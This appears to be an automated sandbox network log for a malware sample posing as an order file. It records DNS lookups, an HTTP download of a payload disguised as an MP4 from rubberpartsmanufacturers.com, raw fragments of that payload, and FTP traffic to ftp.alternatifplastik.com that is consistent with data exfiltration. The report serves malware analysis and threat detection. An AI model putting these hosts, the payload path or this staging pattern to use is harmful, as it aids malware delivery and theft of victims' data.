                                                            Oct 9, 2024 15:02:05.932707071 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.932750940 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.932769060 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.932773113 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.932789087 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.932825089 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.932830095 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.932857037 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.932874918 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.932966948 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.933151960 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.933379889 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.933417082 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.933454037 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.933459044 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.933485985 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.933504105 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.933536053 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.933585882 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.933772087 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.933780909 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.933825970 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.933940887 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.933940887 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.934339046 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.934393883 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.934418917 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.934425116 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.934433937 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.934441090 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.934458017 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.934462070 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.934499025 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.934597015 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.934647083 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.934889078 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.934925079 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.934942961 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.934947014 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.934968948 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.935005903 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.935360909 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.935425043 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.935434103 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.935482979 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.935487032 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.935497046 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.935534954 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.936120987 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.936182976 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.936187983 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.936196089 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.936254978 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.936605930 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.936659098 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.936701059 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.936753035 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.937052011 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.937100887 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.937110901 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.937114954 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.937141895 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.937150955 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.937194109 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.937199116 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.937436104 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.937505007 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.937510014 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.937647104 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.937700987 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.937706947 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.937802076 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.937844038 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.937855005 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.937860012 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.937890053 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.937910080 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.938473940 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.938518047 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.938566923 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.938570976 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.938611031 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.938611031 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.938699007 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.938760042 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.938764095 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.938776016 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.938819885 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.938819885 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.938832998 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.938882113 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.939620972 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.939667940 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.939719915 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.939719915 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.939724922 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.939735889 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.939785004 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.939794064 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.939802885 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.939825058 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.939870119 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.939876080 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.939915895 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.940582037 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.940637112 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.940660954 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.940665007 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.940680027 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.940689087 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.940709114 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.940712929 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.940742970 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.940772057 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.940813065 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.940875053 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.940875053 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.940890074 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.940936089 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.941251993 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.941371918 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.941396952 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.941404104 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.941428900 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.941440105 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.941448927 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.941452980 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.941493034 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.941571951 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.941626072 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.941632032 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.941637039 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.941675901 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.941679001 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.941689014 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.941747904 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.942121029 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.942184925 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.942275047 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.942341089 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.942342997 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.942353964 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.942397118 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.942401886 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.942408085 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.942459106 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.942470074 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.942514896 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.942526102 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.942531109 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.942579985 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.942965031 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.943032980 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.943162918 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.943211079 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.943222046 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.943226099 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.943254948 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.943262100 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.943274021 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.943278074 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.943312883 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.943342924 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.943346024 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.943373919 CEST44349870103.191.208.122192.168.2.9
                                                            Oct 9, 2024 15:02:05.943432093 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:05.950669050 CEST49870443192.168.2.9103.191.208.122
                                                            Oct 9, 2024 15:02:08.040098906 CEST4989421192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:08.045104027 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:08.045236111 CEST4989421192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:08.675556898 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:08.675856113 CEST4989421192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:08.680644035 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:08.900168896 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:08.923407078 CEST4989421192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:08.928302050 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:09.167845011 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:09.168098927 CEST4989421192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:09.173902035 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:09.394056082 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:09.394401073 CEST4989421192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:09.399169922 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:09.618685007 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:09.618923903 CEST4989421192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:09.624062061 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:09.631747961 CEST4985321192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:09.844202995 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:09.844340086 CEST4989421192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:09.849729061 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:10.069533110 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:10.070804119 CEST4990565429192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:10.075763941 CEST65429499055.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:10.076009035 CEST4989421192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:10.076186895 CEST4990565429192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:10.080889940 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:10.692442894 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:10.692825079 CEST4990565429192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:10.692825079 CEST4990565429192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:10.697674990 CEST65429499055.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:10.698143959 CEST65429499055.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:10.698544979 CEST4990565429192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:10.743115902 CEST4989421192.168.2.95.2.84.236
                                                            Oct 9, 2024 15:02:10.917622089 CEST21498945.2.84.236192.168.2.9
                                                            Oct 9, 2024 15:02:10.961879969 CEST4989421192.168.2.95.2.84.236
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 9, 2024 15:01:36.187109947 CEST5082653192.168.2.91.1.1.1
                                                            Oct 9, 2024 15:01:36.701447010 CEST53508261.1.1.1192.168.2.9
                                                            Oct 9, 2024 15:01:43.251147032 CEST5260053192.168.2.91.1.1.1
                                                            Oct 9, 2024 15:01:43.402820110 CEST53526001.1.1.1192.168.2.9
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 9, 2024 15:01:36.187109947 CEST192.168.2.91.1.1.10x506cStandard query (0)rubberpartsmanufacturers.comA (IP address)IN (0x0001)false
                                                            Oct 9, 2024 15:01:43.251147032 CEST192.168.2.91.1.1.10xee61Standard query (0)ftp.alternatifplastik.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 9, 2024 15:01:32.539725065 CEST1.1.1.1192.168.2.90xdfd0No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                            Oct 9, 2024 15:01:32.539725065 CEST1.1.1.1192.168.2.90xdfd0No error (0)dual.s-part-0044.t-0009.fb-t-msedge.nets-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Oct 9, 2024 15:01:32.539725065 CEST1.1.1.1192.168.2.90xdfd0No error (0)s-part-0044.t-0009.fb-t-msedge.net13.107.253.72A (IP address)IN (0x0001)false
                                                            Oct 9, 2024 15:01:36.701447010 CEST1.1.1.1192.168.2.90x506cNo error (0)rubberpartsmanufacturers.com103.191.208.122A (IP address)IN (0x0001)false
                                                            Oct 9, 2024 15:01:43.402820110 CEST1.1.1.1192.168.2.90xee61No error (0)ftp.alternatifplastik.com5.2.84.236A (IP address)IN (0x0001)false
                                                            • rubberpartsmanufacturers.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.949727103.191.208.1224437416C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-09 13:01:37 UTC98OUTGET /manxz/Pqbrsrcnsx.mp4 HTTP/1.1
                                                            Host: rubberpartsmanufacturers.com
                                                            Connection: Keep-Alive
                                                            2024-10-09 13:01:38 UTC234INHTTP/1.1 200 OK
                                                            Date: Wed, 09 Oct 2024 13:01:38 GMT
                                                            Server: Apache
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Last-Modified: Wed, 09 Oct 2024 11:18:34 GMT
                                                            Accept-Ranges: bytes
                                                            Content-Length: 959504
                                                            Content-Type: video/mp4
                                                            2024-10-09 13:01:38 UTC7958INData Raw: e2 28 15 53 f2 7b 15 07 aa d5 4d 1f 3b 2f 02 b6 03 27 fc aa 10 81 f7 c9 70 03 06 1c 22 aa 28 14 82 64 60 6b 1d 58 9a 33 26 ca 89 1a 85 b6 02 35 c2 db b3 17 1a 22 10 f8 52 46 a8 05 84 68 55 5f e8 21 39 2d 11 b0 72 e6 9d 6e 2e ad 62 02 65 3f ed 94 ae 42 c5 65 1f 2b 34 3c a4 a9 27 e5 15 4a cf ec 32 19 8c 82 8b 31 18 2b a1 e1 73 86 35 da 64 25 b7 00 79 1e 25 db 5f a0 a0 08 cd 61 d3 2f 8c 90 ca 6b a1 14 94 60 4f b2 d2 51 ec 16 0a 4a dd 58 71 61 70 b3 f2 b8 2d a3 10 12 5c 74 07 4a fe 91 81 8e c3 6d 8f b8 9b 5a 61 4e ac 3e 0f 1a c8 cb d9 30 fe 29 a8 48 31 23 94 28 92 fe d3 4d 2b bf 49 6d 42 09 ef 8b 4c 83 f8 fd 25 9f 39 71 61 4f c4 84 1c 4a e3 7a 18 96 a9 89 f9 08 06 f7 8d f7 2b b0 de 09 d9 91 64 d2 a3 bc be 29 76 2c 19 e1 cc 3f 71 5e 9d 69 81 f0 1a 05 77 d7 5f
                                                            Data Ascii: (S{M;/'p"(d`kX3&5"RFhU_!9-rn.be?Be+4<'J21+s5d%y%_a/k`OQJXqap-\tJmZaN>0)H1#(M+ImBL%9qaOJz+d)v,?q^iw_
                                                            2024-10-09 13:01:38 UTC8000INData Raw: 1a b3 17 7f 75 07 79 13 cf ef d1 58 7e 08 f3 bc 5b f4 e6 bb 6a 08 2b 03 5c c8 fe 7b 53 af 83 69 db ad 67 d5 aa 23 45 0c 4b 36 4d 80 4b b5 2d c7 a3 a0 1c 95 52 a9 28 fe ad 72 25 cb f4 e2 16 73 e2 34 64 7d a0 3e fa ac e3 9a fa e7 2a c0 78 b7 0a fd 40 b2 0a 0b e8 2b 3f bb 8b fc f9 cf 60 55 04 32 39 2a 2d 92 2c 56 78 c6 31 a5 fd 3a d8 87 a4 c7 66 c3 ef 55 26 1d 13 c6 39 e4 5a f0 55 be 70 5c 70 5c ba 5d f4 0c 70 fe 57 ff 34 43 f6 9c 32 49 d5 00 19 40 2f d3 91 d6 f0 64 14 bd 7f 49 d2 dd 13 92 c1 01 64 01 d1 00 2f 9b 0c e8 aa d1 1f 1a b7 61 09 8a e5 98 cb f6 bc 6f 20 6b c3 d2 c6 de 23 02 dc e1 34 47 99 93 6f ae f5 7e 0e c4 94 c7 58 6c 37 cc 59 4d 74 32 bd 43 02 a9 05 38 11 b3 58 ca 04 8d ff a1 c9 c5 0f 8c 53 ec 67 d1 75 a6 0e 8d de 2b ee 58 29 99 f7 62 ed 30 d3
                                                            Data Ascii: uyX~[j+\{Sig#EK6MK-R(r%s4d}>*x@+?`U29*-,Vx1:fU&9ZUp\p\]pW4C2I@/dId/ao k#4Go~Xl7YMt2C8XSgu+X)b0
                                                            2024-10-09 13:01:38 UTC8000INData Raw: 30 06 f2 49 8f 29 4e 0f 70 49 10 e1 4d 9b 65 31 25 aa ae 16 d9 cb eb 16 a5 0d 0b 4e 14 71 e5 96 82 6b 7a 79 33 a1 5d 96 58 89 91 d7 b6 fc 50 9d 6f 5a 3e c5 42 9c 73 ad bc 57 56 28 36 77 fd fd 1a 40 1d 36 02 da 6a 56 50 03 a5 02 6f 3d fa b9 3c a5 d3 cb 45 e1 91 92 d7 8b c2 fe f2 2e a0 d3 f1 64 7e d1 30 6e 5e 38 ec f1 75 1c 5e 30 be 22 b1 6b cc 87 1a c1 c0 05 64 55 e7 a0 88 aa 49 d8 7b bf df aa 11 7b 5c 14 03 50 76 69 bd 6b 81 51 5e 8b 7f 39 3c a6 41 98 b7 c0 c6 7d 95 41 64 b7 3b dd ed 8b 7a 71 a3 9c 8f 8d 67 3b 8f 0a 92 91 18 b7 86 5a 81 39 9e f5 a8 f5 4c 0d 6c 52 18 81 93 b9 ee f6 d0 9f 92 71 fc a7 90 db 98 d5 3b 98 b6 b0 d0 26 95 12 50 b6 ac 33 54 4b 70 bb ba 3e 83 94 03 13 e8 b3 97 2a 66 77 21 56 f8 ae 3f d8 37 cb b1 40 ec bf 05 44 09 e5 df 66 02 44 b3
                                                            Data Ascii: 0I)NpIMe1%Nqkzy3]XPoZ>BsWV(6w@6jVPo=<E.d~0n^8u^0"kdUI{{\PvikQ^9<A}Ad;zqg;Z9LlRq;&P3TKp>*fw!V?7@DfD
                                                            2024-10-09 13:01:38 UTC8000INData Raw: d9 13 75 01 96 3c 96 1c 60 80 27 7f c3 80 15 6a 8e f3 88 98 31 d0 5b e5 2e 15 93 ed 58 bf ce ed 8c 37 99 b9 40 56 41 8a 90 69 98 dd ef f1 6d f5 95 00 df 40 31 88 48 a1 d0 ff a8 b9 c2 12 b0 57 d3 09 99 4c 77 40 10 b7 38 0e 0f 8d 07 96 f7 d6 56 4a f2 54 6a 64 82 1a 4c af 8f ca 93 98 9b 62 5a be c7 39 79 12 de 68 6a 90 8a 80 89 29 71 f5 0b a6 81 dc 43 26 5b e0 7e d9 42 ca 33 55 3a 29 e7 f2 53 9c 09 2f 0c a7 e8 0b c3 9e 33 b2 c6 e2 fc 89 2b 07 73 13 83 59 84 6f af 47 0b 70 6a d2 7c eb b2 b6 1e 60 39 6d 46 c8 ca f1 31 53 50 75 e0 76 c1 cc 58 e3 ce 4a 44 ab b8 cf 79 50 f7 d2 33 90 04 e0 6f 2e 7d 17 80 f6 a7 97 a1 52 87 54 a2 df c5 8f 18 7c 0d 65 89 ec e6 76 04 dd c1 94 0c c9 9a 79 61 6d cc 7c 87 f1 b2 54 12 55 38 2c 87 91 f2 a0 46 01 c3 19 a6 66 e3 01 7e 19 27
                                                            Data Ascii: u<`'j1[.X7@VAim@1HWLw@8VJTjdLbZ9yhj)qC&[~B3U:)S/3+sYoGpj|`9mF1SPuvXJDyP3o.}RT|evyam|TU8,Ff~'
                                                            2024-10-09 13:01:38 UTC8000INData Raw: 50 32 ff 4b 3f af b0 33 ec 1d 96 0d a7 bf ed ea 5e 56 f1 2a 40 6d 43 2d f0 4f f1 36 ad 80 78 d1 52 9d d2 07 74 7f 51 f6 31 e1 e1 cd 1d b3 61 36 63 b2 50 58 32 54 48 f3 84 c9 52 c8 46 90 0d 67 a4 d0 cb c8 50 08 a7 5e 37 62 57 85 ea 68 1a 8f 74 57 25 b8 5f e9 5d 6a 82 ed 57 28 0e b1 0b 51 06 2c 9a ac 5b f5 90 bd 42 92 8e 57 9f 49 95 5a a7 21 3b 48 4b e8 3a 6d 37 f4 29 35 87 85 1b 1f 78 1b f8 3a 5b 77 27 b8 7e 13 f2 e1 44 98 d5 6f 33 18 ca 45 4c de 4e 47 fe 13 79 3c d2 56 96 e4 d0 a7 3a 98 b1 65 0d 96 3b d3 e1 5e b4 3e 3b 08 cf 56 6d bf b3 3d 6d 1e 1c bc b8 1d f8 07 d1 36 cc 7c 7d b6 2d e9 c7 62 f4 54 cf f6 45 94 91 42 8a 58 b6 23 44 c0 e8 fc bd a1 eb b7 d8 54 58 4b 21 fb 18 ff af aa 5c b6 99 c0 3d 55 8a c6 f7 64 7d 49 3c 75 16 59 61 97 aa 00 40 1a 7d 8b 20
                                                            Data Ascii: P2K?3^V*@mC-O6xRtQ1a6cPX2THRFgP^7bWhtW%_]jW(Q,[BWIZ!;HK:m7)5x:[w'~Do3ELNGy<V:e;^>;Vm=m6|}-bTEBX#DTXK!\=Ud}I<uYa@}
                                                            2024-10-09 13:01:38 UTC8000INData Raw: 1d 8a bf 75 2d cc ee e4 41 90 85 e4 0f 9e 47 2f 3a 5a 10 b9 52 98 68 39 e0 7d 50 88 d8 22 ac 38 e7 09 6a 84 13 26 e4 ab 33 ce 3b 15 0c a8 62 de 65 2c af e0 95 07 d5 1c 38 7f 4d 2b f3 83 37 c9 1c 1b f6 af 1c d6 73 d2 ce 1f 44 76 d3 b9 e8 26 58 b2 b3 10 3d ce a5 88 f1 4a 13 38 fa 63 e5 5e c1 6b 5c 33 ab 22 74 8c 8c 30 9c f8 5c 22 cc 27 ba a8 63 b5 8c 89 a9 46 72 5e 2a 6c 0e 57 2a 38 2f b0 ae ed 0e 92 59 32 65 79 45 16 31 2e 70 fa 1f cc fd 56 fc e8 30 2a e4 6b 39 6a a8 88 ec 8a de 5a 2d ca 6e d8 d0 c1 b3 a7 93 eb 56 69 74 39 7d 72 4b 06 13 e3 fe 73 3b ca b9 33 a4 2c bd 28 ce e0 a8 b4 5d f4 b8 23 a9 8c fd af 89 91 9b 74 82 af 9a 76 0b 35 c0 a1 9d ad 38 7e 3f 89 05 25 f5 e4 9d 68 4d 53 47 fe 36 a0 62 69 9b 5c 72 a1 06 03 66 6c ce 2c ff 16 82 23 00 76 d7 a9 9b
